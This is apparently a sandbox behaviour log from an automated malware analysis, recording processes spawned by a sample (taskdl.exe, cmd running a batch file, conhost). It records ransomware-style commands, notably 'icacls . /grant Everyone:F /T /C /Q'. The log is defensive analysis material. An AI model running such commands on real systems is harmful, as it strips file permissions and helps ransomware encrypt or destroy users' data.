Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 70341721944935.bat	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
